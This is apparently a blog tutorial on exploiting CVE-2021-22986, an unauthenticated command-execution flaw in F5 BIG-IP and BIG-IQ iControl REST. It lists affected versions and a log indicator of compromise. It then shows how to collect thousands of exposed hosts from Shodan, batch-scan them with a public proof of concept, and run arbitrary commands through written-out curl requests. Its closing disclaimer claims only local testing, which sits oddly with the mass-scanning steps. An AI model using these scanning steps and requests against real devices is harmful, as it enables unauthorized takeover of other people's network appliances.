Finding and exploiting iControl REST unauthenticated RCE [CVE-2021-22986]

On March 10, 2021, F5 released an advisory about an unauthenticated RCE in iControl REST. The advisory states that an unauthenticated attacker with network access to the iControl REST interface can execute arbitrary system commands, create or delete files, or disable services.

Vulnerable/affected versions are:

  • F5 BIG-IQ 6.0.0–6.1.0
  • F5 BIG-IQ 7.0.0–7.0.0.1
  • F5 BIG-IQ 7.1.0–7.1.0.2
  • F5 BIG-IP 12.1.0–12.1.5.2
  • F5 BIG-IP 13.1.0–13.1.3.5
  • F5 BIG-IP 14.1.0–14.1.3.1
  • F5 BIG-IP 15.1.0–15.1.2
  • F5 BIG-IP 16.0.0–16.0.1

There is no specific way to identify a vulnerable device from the outside, so we use a simple BIG-IP detection method to find systems potentially impacted by CVE-2021-22986.

Alternatively, if you have access to the device, F5's article gives an indicator of compromise (IOC): a device that has received exploitation attempts will contain this text in /var/log/restjavad*.log. Note that this indicates the device was targeted, not merely that it is vulnerable, and it requires log access on the device itself.

"X-F5-Auth-Token doesn't have value"

We can use Shodan to find potentially vulnerable devices, with the same filter we use to detect BIG-IP devices on Shodan:

http.title:"BIG-IP®-Redirect"

Shodan shows 10,910 devices. Not all of them are vulnerable, so we will detect and exploit the vulnerability using a simple proof of concept written by Al1ex. The PoC contains Chinese text; a translated version is used here. We can either download all the results or use the Shodan CLI to scan for this CVE. First, let's start with the downloaded Shodan result.

We can download the results with the Download Results button. After downloading the results and the PoC, we can start detecting the vulnerability with the PoC. Running python3 CVE_2021_22986.py -h shows the help menu.

The help menu lists an option described as batch detection:

python3 CVE_2021_22986.py  -s true -f filename

First, filter the IP addresses out of the result downloaded from Shodan, using grep with a regex in a Linux shell. An address can appear several times in an export, so drop duplicates and save the output to a file:

grep -Po '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' shodan_file | sort -u > targets.txt

With the addresses saved to a file, it is time to start the scan (python3 CVE_2021_22986.py -s true -f targets.txt).

After detection, you can use poc.py to execute commands on the target system without retyping the full exploit command each time.

You can also exploit this vulnerability manually with the following requests (the bundle-install-tasks request in Step-1 is sent a second time in Step-2, and Step-3 then runs the command through /mgmt/tm/util/bash):

Step-1: curl -ksu admin: https://[target-ip]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"[command-to-execute]"}'

Step-2: curl -ksu admin: https://[target-ip]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"[command-to-execute]"}'

Step-3: curl -su admin: -H "Content-Type: application/json" http://[target-ip]:8100/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c [command-to-execute]"}'

Using the automated exploit is much faster for detection and exploitation; manual exploitation is slow and takes far more time when testing a list of targets.

You can use this to find a P1 in your bug bounty program if any of the target's BIG-IP products are affected by this vulnerability.

Nuclei Detection Script: CVE-2021–22986.yaml

[Disclaimer: the IP I tested and exploited was my own local Docker IP. Please do not exploit or test other people's IPs without permission. This article is for educational purposes only.]

Joy Ghosh

Security Researcher | CTF Player | Web Application Pen-tester | Programmer
